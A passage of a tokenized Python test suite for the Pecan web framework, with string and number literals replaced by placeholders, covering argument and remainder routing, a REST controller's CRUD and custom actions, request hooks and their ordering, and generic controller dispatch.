== <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_args_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_args_with_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_multiple_variable_kwargs_with_explicit_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_kwargs_with_explicit_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( <EOL> '<STR_LIT>' <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_kwargs_with_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_kwargs_with_encoded_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> result = '<STR_LIT>' <EOL> assert r . body == b_ ( result ) <EOL> def test_variable_all ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_all_with_one_extra ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_all_with_two_extras ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_mixed ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_mixed_explicit ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_post_with_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_post_mixed ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_no_remainder ( self ) : <EOL> try : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int != <NUM_LIT:200> <EOL> except Exception as ex : <EOL> assert type ( ex ) == TypeError <EOL> assert ex . args [ <NUM_LIT:0> ] in ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_one_remainder ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_two_remainders ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_many_remainders ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_remainder_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_remainder_with_many_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_remainder ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_three_remainders ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_many_remainders ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_remainder_with_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_many_remainders_with_many_kwargs ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> class TestRestController ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class OthersController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def echo ( self , req , resp , value ) : <EOL> return str ( value ) <EOL> class ThingsController ( RestController ) : <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> _custom_actions = { '<STR_LIT:count>' : [ '<STR_LIT:GET>' ] , '<STR_LIT>' : [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] } <EOL> others = OthersController ( ) <EOL> @ expose ( ) <EOL> def get_one ( self , req , resp , id ) : <EOL> return self . data [ int ( id ) ] <EOL> @ expose ( '<STR_LIT>' ) <EOL> def get_all ( self , req , resp ) : <EOL> return dict ( items = self . data ) <EOL> @ expose ( ) <EOL> def length ( self , req , resp , id , value = None ) : <EOL> length = len ( self . data [ int ( id ) ] ) <EOL> if value : <EOL> length += len ( value ) <EOL> return str ( length ) <EOL> @ expose ( ) <EOL> def post ( self , req , resp , value ) : <EOL> self . data . append ( value ) <EOL> resp . status = <NUM_LIT> <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def edit ( self , req , resp , id ) : <EOL> return '<STR_LIT>' % self . data [ int ( id ) ] <EOL> @ expose ( ) <EOL> def put ( self , req , resp , id , value ) : <EOL> self . data [ int ( id ) ] = value <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def get_delete ( self , req , resp , id ) : <EOL> return '<STR_LIT>' % self . data [ int ( id ) ] <EOL> @ expose ( ) <EOL> def delete ( self , req , resp , id ) : <EOL> del self . data [ int ( id ) ] <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def reset ( self , req , resp ) : <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def post_options ( self , req , resp ) : <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def options ( self , req , resp ) : <EOL> abort ( <NUM_LIT> ) <EOL> @ expose ( ) <EOL> def other ( self , req , resp ) : <EOL> abort ( <NUM_LIT> ) <EOL> class RootController ( object ) : <EOL> things = ThingsController ( ) <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_get_all ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( dumps ( dict ( items = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) ) <EOL> def test_get_one ( self ) : <EOL> for i , value in enumerate ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> r = self . app_ . get ( '<STR_LIT>' % i ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( value ) <EOL> def test_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_custom_action ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_put ( self ) : <EOL> r = self . app_ . put ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_put_with_method_parameter_and_get ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT:X>' } , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_put_with_method_parameter_and_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_get_delete ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_delete_method ( self ) : <EOL> r = self . app_ . delete ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_delete_with_method_parameter ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_delete_with_method_parameter_and_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_custom_method_type ( self ) : <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_custom_method_type_with_method_parameter ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_options ( self ) : <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_options_with_method_parameter ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_other_custom_action ( self ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" ) <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_other_custom_action_with_method_parameter ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_nested_controller_with_trailing_slash ( self ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" ) <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_nested_controller_without_trailing_slash ( self ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" ) <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_invalid_custom_action ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_named_action ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( str ( len ( '<STR_LIT>' ) ) ) <EOL> def test_named_nested_action ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT:test>' ) <EOL> def test_nested_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT:test>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT:test>' ) <EOL> class TestHooks ( PecanTestCase ) : <EOL> def test_basic_single_hook ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class SimpleHook ( PecanHook ) : <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def after ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' ) <EOL> app = TestApp ( Pecan ( <EOL> RootController ( ) , <EOL> hooks = [ SimpleHook ( ) ] , <EOL> use_context_locals = False <EOL> ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:4> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> def test_basic_multi_hook ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class SimpleHook ( PecanHook ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = str ( id ) <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def after ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' + self . id ) <EOL> app = TestApp ( Pecan ( RootController ( ) , hooks = [ <EOL> SimpleHook ( <NUM_LIT:1> ) , SimpleHook ( <NUM_LIT:2> ) , SimpleHook ( <NUM_LIT:3> ) <EOL> ] , use_context_locals = False ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:10> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:4> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:5> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:6> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:7> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:8> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:9> ] == '<STR_LIT>' <EOL> def test_partial_hooks ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def causeerror ( self , req , resp ) : <EOL> return [ ] [ <NUM_LIT:1> ] <EOL> class ErrorHook ( PecanHook ) : <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' ) <EOL> class OnRouteHook ( PecanHook ) : <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> app = TestApp ( Pecan ( RootController ( ) , hooks = [ <EOL> ErrorHook ( ) , OnRouteHook ( ) <EOL> ] , use_context_locals = False ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:2> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> run_hook = [ ] <EOL> try : <EOL> response = app . get ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> assert isinstance ( e , IndexError ) <EOL> assert len ( run_hook ) == <NUM_LIT:2> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT:error>' <EOL> def test_on_error_response_hook ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def causeerror ( self , req , resp ) : <EOL> return [ ] [ <NUM_LIT:1> ] <EOL> class ErrorHook ( PecanHook ) : <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' ) <EOL> r = webob . Response ( ) <EOL> r . text = u_ ( '<STR_LIT>' ) <EOL> return r <EOL> app = TestApp ( Pecan ( RootController ( ) , hooks = [ <EOL> ErrorHook ( ) <EOL> ] , use_context_locals = False ) ) <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:1> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT:error>' <EOL> assert response . text == '<STR_LIT>' <EOL> def test_prioritized_hooks ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class SimpleHook ( PecanHook ) : <EOL> def __init__ ( self , id , priority = None ) : <EOL> self . id = str ( id ) <EOL> if priority : <EOL> self . priority = priority <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def after ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' + self . id ) <EOL> papp = Pecan ( RootController ( ) , hooks = [ <EOL> SimpleHook ( <NUM_LIT:1> , <NUM_LIT:3> ) , SimpleHook ( <NUM_LIT:2> , <NUM_LIT:2> ) , SimpleHook ( <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> ] , use_context_locals = False ) <EOL> app = TestApp ( papp ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:10> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:4> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:5> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:6> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:7> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:8> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:9> ] == '<STR_LIT>' <EOL> def test_basic_isolated_hook ( self ) : <EOL> run_hook = [ ] <EOL> class SimpleHook ( PecanHook ) : <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def after ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' ) <EOL> class SubSubController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class SubController ( HookController ) : <EOL> __hooks__ = [ SimpleHook ( ) ] <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> sub = SubSubController ( ) <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> sub = SubController ( ) <EOL> app = TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:1> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> run_hook = [ ] <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:3> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> run_hook = [ ] <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:3> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> def test_isolated_hook_with_global_hook ( self ) : <EOL> run_hook = [ ] <EOL> class SimpleHook ( PecanHook ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = str ( id ) <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def after ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' + self . id ) <EOL> class SubController ( HookController ) : <EOL> __hooks__ = [ SimpleHook ( <NUM_LIT:2> ) ] <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> sub = SubController ( ) <EOL> app = TestApp ( Pecan ( <EOL> RootController ( ) , <EOL> hooks = [ SimpleHook ( <NUM_LIT:1> ) ] , <EOL> use_context_locals = False <EOL> ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:4> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> run_hook = [ ] <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:6> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:4> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:5> ] == '<STR_LIT>' <EOL> class TestGeneric ( PecanTestCase ) : <EOL> @ property <EOL> def root ( self ) : <EOL> class RootController ( object ) : <EOL> def __init__ ( self , unique ) : <EOL> self . unique = unique <EOL> @ expose ( generic = True , template = '<STR_LIT>' ) <EOL> def index ( self , req , resp ) : <EOL> assert self . __class__ . __name__ == '<STR_LIT>' <EOL> assert isinstance ( req , Request ) <EOL> assert isinstance ( resp , Response ) <EOL> assert self . unique == req . headers . get ( '<STR_LIT>' ) <EOL> return { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> @ index . when ( method = '<STR_LIT:POST>' , template = '<STR_LIT>' ) <EOL> def index_post ( self , req , resp ) : <EOL> assert self . __class__ . __name__ == '<STR_LIT>' <EOL> assert isinstance ( req , Request ) <EOL> assert isinstance ( resp , Response ) <EOL> assert self . unique == req . headers . get ( '<STR_LIT>' ) <EOL> return req . json <EOL> @ expose ( template = '<STR_LIT>' ) <EOL> def echo ( self , req , resp ) : <EOL> assert self . __class__ . __name__ == '<STR_LIT>' <EOL> assert isinstance ( req , Request ) <EOL> assert isinstance ( resp , Response ) <EOL> assert self . unique == req . headers . get ( '<STR_LIT>' ) <EOL> return req . json <EOL> @ expose ( template = '<STR_LIT>' ) <EOL> def extra ( self , req , resp , first , second ) : <EOL> assert self . __class__ . __name__ == '<STR_LIT>' <EOL> assert isinstance ( req , Request ) <EOL> assert isinstance ( resp , Response ) <EOL> assert self . unique == req . headers . get ( '<STR_LIT>' ) <EOL> return { '<STR_LIT>' : first , '<STR_LIT>' : second } <EOL> return RootController <EOL> def test_generics_with_im_self_default ( self ) : <EOL> uniq = str ( time . time ( ) ) <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( uniq ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT:/>' , headers = { '<STR_LIT>' : uniq } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> json_resp = loads ( r . body . decode ( ) ) <EOL> assert json_resp [ '<STR_LIT:hello>' ] == '<STR_LIT>' <EOL> def test_generics_with_im_self_with_method ( self ) : <EOL> uniq = str ( time . time ( ) ) <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( uniq ) , use_context_locals = False ) ) <EOL> r = app . post_json ( '<STR_LIT:/>' , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , headers = { '<STR_LIT>' : uniq } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> json_resp = loads ( r . body . decode ( ) ) <EOL> assert json_resp [ '<STR_LIT:foo>' ] == '<STR_LIT:bar>' <EOL> def test_generics_with_im_self_with_path ( self ) : <EOL> uniq = str ( time . time ( ) ) <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( uniq ) , use_context_locals = False ) ) 